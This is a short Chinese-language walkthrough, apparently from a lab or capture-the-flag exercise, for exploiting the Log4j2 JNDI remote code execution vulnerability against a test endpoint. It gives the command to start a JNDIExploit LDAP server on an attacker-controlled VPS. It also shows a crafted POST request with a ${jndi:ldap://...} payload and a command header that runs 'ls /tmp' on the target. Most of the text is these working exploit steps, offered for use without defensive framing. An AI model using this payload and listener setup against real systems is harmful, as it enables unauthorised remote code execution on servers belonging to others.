描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 当前环境测试url:http://xxxxx/hello post参数为:payload=xxxxx
1、首先准备一个vps环境(腾讯云阿里云都可)
在vps上开启ldap环境:(Log4j2-Exp工具在github上自行下载)
输入命令开启监听:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的vps的IP地址 -l 7000 -p 5000
2、bp抓包伺候
抓包获取get请求包,记得转换为post包,加上/hello;cmd:ls /tmp;payload=${jndi:ldap://你的vps地址:7000/TomcatBypass/TomcatEcho}
注意查看监听端口数据回显